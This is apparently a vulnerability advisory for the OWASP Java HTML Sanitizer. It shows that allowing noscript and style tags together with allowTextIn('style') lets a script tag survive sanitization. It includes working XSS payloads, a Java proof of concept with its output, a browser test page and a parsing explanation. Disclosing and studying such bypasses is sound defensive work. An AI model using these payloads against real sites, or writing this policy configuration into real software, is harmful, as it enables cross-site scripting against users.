Summary
It is observed that the OWASP Java HTML Sanitizer is vulnerable to XSS if an HtmlPolicyBuilder allows the noscript and style tags and enables allowTextIn inside the style tag. A payload crafted so that its CSS is not sanitized can then smuggle through tags that the HTML policy does not allow.
Details
The OWASP Java HTML Sanitizer is vulnerable to XSS, but only when HtmlPolicyBuilder allows both the noscript and style tags and enables allowTextIn inside style tags.
This is an edge case: if a policy allows the style tag with allowTextIn("style") together with any other tags except noscript, the sanitizer would be safe from this XSS. The difference comes from how the browser parses noscript tags in the sanitized output.
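The vulnerable configuration described above can be expressed as a simple predicate over the element names passed to allowElements(...) and allowTextIn(...). The sketch below is a hypothetical helper (RiskyPolicyCheck is not part of owasp-java-html-sanitizer). It only encodes the condition stated in this advisory and is not an exhaustive safety check for sanitizer policies.

```java
import java.util.Locale;
import java.util.Set;
import java.util.stream.Collectors;
import java.util.stream.Stream;

// Hypothetical helper, NOT part of owasp-java-html-sanitizer: it encodes the
// configuration described in this advisory as a predicate over the element
// names that would be passed to allowElements(...) and allowTextIn(...).
final class RiskyPolicyCheck {

    private RiskyPolicyCheck() {}

    /** Trims and lower-cases element names, since HTML tag names are case-insensitive. */
    private static Set<String> normalize(String... names) {
        return Stream.of(names)
                .map(n -> n.trim().toLowerCase(Locale.ROOT))
                .collect(Collectors.toSet());
    }

    /**
     * Returns true when the allowlist matches the reported pattern:
     * both noscript and style are allowed, and text is allowed inside style.
     */
    static boolean isVulnerableCombination(String[] allowedElements, String[] textAllowedIn) {
        Set<String> elements = normalize(allowedElements);
        Set<String> textIn = normalize(textAllowedIn);
        return elements.contains("noscript")
                && elements.contains("style")
                && textIn.contains("style");
    }
}
```

For the PoC policy (elements "p, noscript, style" and text allowed in "style") the predicate returns true; removing noscript from the element list makes it return false.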
PoC
- Create an HtmlPolicyBuilder that allows the p, noscript, and style HTML tags and calls .allowTextIn("style").
- There are two nearly identical XSS payloads; the only difference is that one uses a p tag and the other a noscript tag.
Both payloads contain script tags, which are an XSS vector and should be stripped out during sanitization.
1. <noscript><style></noscript><script>alert(1)</script>
2. <p><style></p><script>alert(1)</script>
- Run the following code, which sanitizes both payloads.
import org.owasp.html.HtmlPolicyBuilder;
import org.owasp.html.PolicyFactory;

public class Main {
    private static final String ALLOWED_HTML_TAGS = "p, noscript, style";

    /**
     * Description of vulnerability:
     * The OWASP sanitizer sanitizes user input according to the allowlisted HTML tags.
     * Even though script tags are not allowed by the HTML element policy,
     * this edge case can still lead to XSS.
     */
    public static void main(String[] args) {
        withAllowedTextAndStyleTag();
    }

    /**
     * Test case: vulnerable to XSS.
     */
    public static void withAllowedTextAndStyleTag() {
        // Allow p, noscript and style, and allow raw text inside style.
        PolicyFactory policy = new HtmlPolicyBuilder()
                .allowElements(ALLOWED_HTML_TAGS.split("\\s*,\\s*"))
                .allowTextIn("style")
                .toFactory();
        String untrustedHTMLOne = "<noscript><style></noscript><script>alert(1)</script>";
        String untrustedHTMLTwo = "<p><style></p><script>alert(1)</script>";
        System.out.println("PAYLOAD: " + untrustedHTMLOne + "\nSANITIZED OUTPUT: " + policy.sanitize(untrustedHTMLOne));
        System.out.println("PAYLOAD: " + untrustedHTMLTwo + "\nSANITIZED OUTPUT: " + policy.sanitize(untrustedHTMLTwo));
    }
}
Use the latest library version
<dependency>
<groupId>com.googlecode.owasp-java-html-sanitizer</groupId>
<artifactId>owasp-java-html-sanitizer</artifactId>
<version>20240325.1</version>
</dependency>
- The output of the PoC code should look like this:
PAYLOAD: <noscript><style></noscript><script>alert(1)</script>
SANITIZED OUTPUT: <noscript><style></noscript><script>alert(1)</script></style></noscript>
PAYLOAD: <p><style></p><script>alert(1)</script>
SANITIZED OUTPUT: <p><style></p><script>alert(1)</script></style></p>
- Let's look at what happened during sanitization:
--------------------------| --> anything after the style tag is considered CSS and is not sanitized
PAYLOAD: <noscript><style> {</noscript><script>alert(1)</script>} -> CSS
-----------------------------------| --> after sanitization, the payload in the script tag remains unchanged, and the style and noscript tags are closed.
SANITIZED OUTPUT: <noscript><style>{</noscript><script>alert(1)</script>}</style></noscript>
-------------------| --> anything after the style tag is considered CSS and is not sanitized
PAYLOAD: <p><style></p>{<script>alert(1)</script>} -> CSS
--------------------------- | --> after sanitization, the payload in the script tag remains unchanged, and the style and p tags are closed.
SANITIZED OUTPUT: <p><style>{</p><script>alert(1)</script>}</style></p>
- Create a sample HTML page and paste in both sanitized outputs shown above:
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>POC OF SANITIZER OUTPUT</title>
</head>
<body>
<!--XSS OUTPUT : <noscript><style></noscript><script>alert(1)</script></style></noscript>-->
<noscript><style></noscript><script>alert(1)</script></style></noscript>
<!-- SAFE OUTPUT -->
<p><style></p><script>alert(1)</script></style></p>
</body>
</html>
- Open this HTML page in a browser; it should pop an alert.

- Open the browser's developer tools (Inspect Element) to see what happened. Looking closely, the payload that combines the p tag with the style tag did not cause XSS: the browser treated everything after the style tag as CSS.

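- The payload that combines the noscript tag with the style tag did cause XSS.
The browser parsed the noscript element as wrapping the style tag, then closed the noscript element at </noscript>; the script tag that follows was therefore treated as a valid HTML element and executed. This happens because, when scripting is enabled, the browser's HTML parser treats the content of a noscript element as raw text up to </noscript>, so the <style> inside it never opens a style element. This is very different from the previous example with the p tag, and it leads to XSS.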
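The parsing difference can be sketched with a deliberately simplified model of the tokenizer. This is not a real HTML parser and not the sanitizer's code: it only recognises attribute-free tags, and BrowserParseModel and scriptElementCreated are hypothetical names. The scriptingEnabled flag stands in for the browser's scripting flag; with it off, the model handles the noscript output the way the sanitized output above suggests the sanitizer did, keeping the script tag inside the style text.

```java
import java.util.Locale;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

// Deliberately simplified model of the browser tokenizer (NOT a real HTML parser):
// only start/end tags without attributes are recognised. Inside a "raw text"
// element, every other tag is plain text until that element's own end tag.
final class BrowserParseModel {

    private static final Pattern TAG = Pattern.compile("<(/?)([a-zA-Z]+)>");

    private BrowserParseModel() {}

    /** Elements whose content this model treats as raw text. */
    private static boolean isRawText(String name, boolean scriptingEnabled) {
        // With scripting enabled, noscript content is parsed as raw text (assumed model of the HTML spec rule).
        return name.equals("style") || (scriptingEnabled && name.equals("noscript"));
    }

    /** Returns true if a <script> start tag would be parsed as a real element. */
    static boolean scriptElementCreated(String html, boolean scriptingEnabled) {
        Matcher m = TAG.matcher(html);
        String rawTextEnd = null; // name of the end tag that closes the current raw text run
        while (m.find()) {
            boolean isEnd = !m.group(1).isEmpty();
            String name = m.group(2).toLowerCase(Locale.ROOT);
            if (rawTextEnd != null) {
                if (isEnd && name.equals(rawTextEnd)) {
                    rawTextEnd = null; // matching end tag: leave raw text mode
                }
                continue; // any other tag inside raw text is just text
            }
            if (!isEnd && name.equals("script")) {
                return true; // script start tag outside raw text becomes an element
            }
            if (!isEnd && isRawText(name, scriptingEnabled)) {
                rawTextEnd = name;
            }
        }
        return false;
    }
}
```

Under this model, the noscript output produces a script element only when scripting is enabled, while the p output never does, which matches the behavior observed in the browser.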

Impact
- This could potentially lead to XSS in applications that use such a policy.
Ref: https://owasp.org/www-community/attacks/xss/
References